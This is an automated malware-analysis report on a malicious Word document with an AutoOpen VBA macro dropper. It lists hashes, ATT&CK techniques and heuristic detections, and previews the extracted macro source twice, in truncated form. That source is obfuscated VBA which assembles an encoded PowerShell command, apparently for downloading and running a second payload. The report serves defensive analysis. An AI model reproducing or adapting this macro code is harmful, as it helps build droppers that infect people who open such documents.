Office (OLE) malware analysis — malicious · 90e94c4979bdd435

MALICIOUS

Office (OLE)

226.0 KB Created: 2018-06-28 20:47:00 Authoring application: Microsoft Office Word First seen: 2018-07-14

MD5: 62741fdbbcd962105991450b027e9963 SHA-1: 98d34562292b3e91cc2d96cfd0f8fec49f1bf86c SHA-256: 90e94c4979bdd435b48c49e99b405926c61d3d6a07b644a793d52f3e6eb86f96

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a Microsoft Office document containing a VBA macro. Heuristics indicate the presence of an AutoOpen macro that uses the Shell() function, a critical finding suggesting execution of arbitrary commands. The ClamAV detection further confirms its malicious nature as a dropper. The VBA script, though obfuscated, explicitly uses the Shell() function, which is a primary indicator of its intent to download and execute a secondary payload.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6595566-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6595566-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11895 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11895 bytes
SHA-256: `ddd001d052ac56f812bc7500817d2b3bfdd49764972f5107c92b1f5d8e2033fe`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "dZiAfhzzXjkh" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "wVAQtKHF" Function fQDcDlUkj() On Error Resume Next pzwfU = 68238 + Atn(93410) / 21674 / Round(72266) / 55843 / CInt(whAFP) jtLGtb = ChrB(26519 + Sin(ijizf * CLng(cjaPH + 36491) + 52452 + iHjNuK)) XcSrL = "HELL " + " " + " " + " " + " " + " " + " " + Chr(34) + "$" + Chr(40) + "SeT" + "-ITEM " + " 'vARiaB" + "LE:OFs'" + " ''" + Chr(41) + Chr(34) + " " + Chr(43) + "[s" lGfBmK = 442 + Atn(63216) / 25053 / Round(92486) / 46114 / CInt(clzNNG) hMGkw = ChrB(93857 + Sin(CKEWj * CLng(CUzdDw + 86778) + 22940 + DNTjiw)) aPimiY = "TrINg]" + Chr(40) + " " + "[ChAR[]] " + Chr(40) + "34," + " 74 ," + "69,116,59" + ", 10" + "4, 9" + "9,11" + "3,43, 105" + ",100 " + ", 108 ,99" + ", 10" jtWHod = 41765 + Atn(58749) / 41660 / Round(63095) / 9192 / CInt(HpcqP) hHnWKR = ChrB(25254 + Sin(FJsRPO * CLng(JbLzZ + 85140) + 49360 + THWrWD)) TwiqAAUUbY = "1, 114,38" + ",72,99" + ",114" + " ,40 ," + "81 , " + "99, " + "100,69, " + "106,111,9" + "9 , 104, " + "114 ,61" aXDrBr = 10208 + Atn(24520) / 66746 / Round(9327) / 88579 / CInt(YMlERq) wORqq = ChrB(98620 + Sin(IUOna * CLng(qSiVNX + 24909) + 50103 + Ocvfw)) YAMzmFFJn = ", 34 , 11" + "6 ,1" + "03,73, " + "59 ,33" + " ,110,114" + " , 1" + "14 , " + "118 ,60," + " 41, 4" + "1 ,113, " + "113,113" + " , 40 ,10" mhDEA = 34199 + Atn(10457) / 45540 / Round(18005) / 62687 / CInt(stikz) iDCFdQ = ChrB(82670 + Sin(dfuAov * CLng(AGVnL + 67523) + 48966 + lvZoA)) FAVpZNqH = "7 ,11" + "1 ,116," + "111 , 103" + ", 107 ,10" + "0 , 115, " + "114 ," + " 114, " + "115,40 ," + "101,1" + "05, " + "107 " TrTQhQ = 52379 + Atn(93148) / 93246 / Round(18166) / 32553 / CInt(KXmLX) lBsnN = ChrB(95388 + Sin(LFfRJE * CLng(qPKnaj + 13679) + 59683 + DJLWzY)) sKWcw = ",41 ," + " 76,97,1" + "17,1" + "06,78, " + "41 , 70" + " , 110,1" + "14 , " + "114,118, " + "60, 41, " + "41,103 , " + "111 ," + " 116 , 10" laXED = 97902 + Atn(74277) / 61464 / Round(57397) / 41873 / CInt(WLvfmF) VuMwkn = ChrB(25832 + Sin(QodBb * CLng(mCtqmz + 45595) + 84189 + iJFFlT)) icuriaim = "7,10" + "3, 126 " + ", 126 " + ",40 ," + "116," + " 117 ,41 " + ", 12" + "6 ,50 ,1" + "19 , " YXGjii = 79791 + Atn(74503) / 81032 / Round(69421) / 83568 / CInt(iwCcus) ICoAGR = ChrB(57090 + Sin(ipfic * CLng(cPGuuI + 16923) + 25659 + ABHZJ)) jKHTvzwiC = "119,103" + ",107" + " , 4" + "1, 70 " + ",110, 1" + "14 , 1" + "14 ,1" + "18 ,60" + " ,41 ," chKMBL = 73370 + Atn(69055) / 43215 / Round(807) / 29123 / CInt(MGzLB) LFivh = ChrB(99990 + Sin(avvoww * CLng(TmGHUV + 51020) + 51983 + fkufHw)) mSwToPdH = "41,1" + "13 ,1" + "13 , 113," + " 40," + " 100 ," + " 105,104" + " ,117, 1" fQDcDlUkj = XcSrL + aPimiY + TwiqAAUUbY + YAMzmFFJn + FAVpZNqH + sKWcw + icuriaim + jKHTvzwiC + mSwToPdH JpAsO = 7982 + Atn(92236) / 63271 / Round(23) / 20623 / CInt(bQqvXB) jZAqq = ChrB(60465 + Sin(kPCKnU * CLng(iomwwF + 56310) + 30314 + ZHJtzK)) End Function Function CMsvKJnPub() On Error Resume Next jMsHbW = 11621 + Atn(36551) / 97372 / Round(40616) / 7963 / CInt(otWMqz) bEzZwu = ChrB(32397 + Sin(aihmpZ * CLng(TwuMB + 14466) + 66588 + zcBzb)) rkrbczsi = "03 ,111" + ", 114 ," + " 99 ,116 " + ", 103" + " ,118, 1" + "11 ,103,1" + "17,105,11" + "6 , " + "111, 99 " + ",104, 11" DuTtBj = 91314 + Atn(74147) / 74232 / Round(92774) / 26641 / CInt(nfkRj) EYZXS = ChrB(56369 + Sin(pskzwu * CLng(pkXoNs + 76545) + 81025 + jLwwr)) HZkGq = "4, 10" + "3 ,111" + ", 11" + "7,40 ," + " 101 , 10" + "5 ,10" + "7,41,8" Djitm = 89824 + Atn(3973) / 46085 / Round(61348) / 54359 / CInt(vLqKpp) SUCHw = ChrB(6937 + Sin(aOEtLT * CLng(GWpBOD + 14680) + 319 + MrLXzb)) rdwPXkq = "2,67, 85" + " , 82, 4" + "9 ,49,49" + " ,41 , 84" + " , 8" + "0 ,97 ,11" + "6, 82," + "75,1" + "26, 41," JrWwfX = 32087 + Atn(91553) / 74344 / Round(59530) / 6368 / CInt(jziUI) o ... (truncated)

SHA-256: ddd001d052ac56f812bc7500817d2b3bfdd49764972f5107c92b1f5d8e2033fe

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "dZiAfhzzXjkh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wVAQtKHF"
Function fQDcDlUkj()
On Error Resume Next
pzwfU = 68238 + Atn(93410) / 21674 / Round(72266) / 55843 / CInt(whAFP)
jtLGtb = ChrB(26519 + Sin(ijizf * CLng(cjaPH + 36491) + 52452 + iHjNuK))
XcSrL = "HELL  " + "         " + "      " + "        " + "       " + "       " + "  " + Chr(34) + "$" + Chr(40) + "SeT" + "-ITEM " + " 'vARiaB" + "LE:OFs'" + " ''" + Chr(41) + Chr(34) + " " + Chr(43) + "[s"
lGfBmK = 442 + Atn(63216) / 25053 / Round(92486) / 46114 / CInt(clzNNG)
hMGkw = ChrB(93857 + Sin(CKEWj * CLng(CUzdDw + 86778) + 22940 + DNTjiw))
aPimiY = "TrINg]" + Chr(40) + " " + "[ChAR[]] " + Chr(40) + "34," + " 74 ," + "69,116,59" + ", 10" + "4, 9" + "9,11" + "3,43, 105" + ",100 " + ", 108 ,99" + ", 10"
jtWHod = 41765 + Atn(58749) / 41660 / Round(63095) / 9192 / CInt(HpcqP)
hHnWKR = ChrB(25254 + Sin(FJsRPO * CLng(JbLzZ + 85140) + 49360 + THWrWD))
TwiqAAUUbY = "1, 114,38" + ",72,99" + ",114" + " ,40 ," + "81 , " + "99, " + "100,69, " + "106,111,9" + "9 , 104, " + "114 ,61"
aXDrBr = 10208 + Atn(24520) / 66746 / Round(9327) / 88579 / CInt(YMlERq)
wORqq = ChrB(98620 + Sin(IUOna * CLng(qSiVNX + 24909) + 50103 + Ocvfw))
YAMzmFFJn = ", 34 , 11" + "6 ,1" + "03,73, " + "59 ,33" + " ,110,114" + " , 1" + "14 , " + "118 ,60," + " 41, 4" + "1 ,113, " + "113,113" + " , 40 ,10"
mhDEA = 34199 + Atn(10457) / 45540 / Round(18005) / 62687 / CInt(stikz)
iDCFdQ = ChrB(82670 + Sin(dfuAov * CLng(AGVnL + 67523) + 48966 + lvZoA))
FAVpZNqH = "7 ,11" + "1 ,116," + "111 , 103" + ", 107 ,10" + "0 , 115, " + "114 ," + " 114, " + "115,40 ," + "101,1" + "05, " + "107 "
TrTQhQ = 52379 + Atn(93148) / 93246 / Round(18166) / 32553 / CInt(KXmLX)
lBsnN = ChrB(95388 + Sin(LFfRJE * CLng(qPKnaj + 13679) + 59683 + DJLWzY))
sKWcw = ",41 ," + " 76,97,1" + "17,1" + "06,78, " + "41 , 70" + " , 110,1" + "14 , " + "114,118, " + "60, 41, " + "41,103 , " + "111 ," + " 116 , 10"
laXED = 97902 + Atn(74277) / 61464 / Round(57397) / 41873 / CInt(WLvfmF)
VuMwkn = ChrB(25832 + Sin(QodBb * CLng(mCtqmz + 45595) + 84189 + iJFFlT))
icuriaim = "7,10" + "3, 126 " + ", 126 " + ",40 ," + "116," + " 117 ,41 " + ", 12" + "6 ,50 ,1" + "19 , "
YXGjii = 79791 + Atn(74503) / 81032 / Round(69421) / 83568 / CInt(iwCcus)
ICoAGR = ChrB(57090 + Sin(ipfic * CLng(cPGuuI + 16923) + 25659 + ABHZJ))
jKHTvzwiC = "119,103" + ",107" + " , 4" + "1, 70 " + ",110, 1" + "14 , 1" + "14 ,1" + "18 ,60" + " ,41 ,"
chKMBL = 73370 + Atn(69055) / 43215 / Round(807) / 29123 / CInt(MGzLB)
LFivh = ChrB(99990 + Sin(avvoww * CLng(TmGHUV + 51020) + 51983 + fkufHw))
mSwToPdH = "41,1" + "13 ,1" + "13 , 113," + " 40," + " 100 ," + " 105,104" + " ,117, 1"
fQDcDlUkj = XcSrL + aPimiY + TwiqAAUUbY + YAMzmFFJn + FAVpZNqH + sKWcw + icuriaim + jKHTvzwiC + mSwToPdH
JpAsO = 7982 + Atn(92236) / 63271 / Round(23) / 20623 / CInt(bQqvXB)
jZAqq = ChrB(60465 + Sin(kPCKnU * CLng(iomwwF + 56310) + 30314 + ZHJtzK))
End Function
Function CMsvKJnPub()
On Error Resume Next
jMsHbW = 11621 + Atn(36551) / 97372 / Round(40616) / 7963 / CInt(otWMqz)
bEzZwu = ChrB(32397 + Sin(aihmpZ * CLng(TwuMB + 14466) + 66588 + zcBzb))
rkrbczsi = "03 ,111" + ", 114 ," + " 99 ,116 " + ", 103" + " ,118, 1" + "11 ,103,1" + "17,105,11" + "6 , " + "111, 99 " + ",104, 11"
DuTtBj = 91314 + Atn(74147) / 74232 / Round(92774) / 26641 / CInt(nfkRj)
EYZXS = ChrB(56369 + Sin(pskzwu * CLng(pkXoNs + 76545) + 81025 + jLwwr))
HZkGq = "4, 10" + "3 ,111" + ", 11" + "7,40 ," + " 101 , 10" + "5 ,10" + "7,41,8"
Djitm = 89824 + Atn(3973) / 46085 / Round(61348) / 54359 / CInt(vLqKpp)
SUCHw = ChrB(6937 + Sin(aOEtLT * CLng(GWpBOD + 14680) + 319 + MrLXzb))
rdwPXkq = "2,67, 85" + " , 82, 4" + "9 ,49,49" + " ,41 , 84" + " , 8" + "0 ,97 ,11" + "6, 82," + "75,1" + "26, 41,"
JrWwfX = 32087 + Atn(91553) / 74344 / Round(59530) / 6368 / CInt(jziUI)
o
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.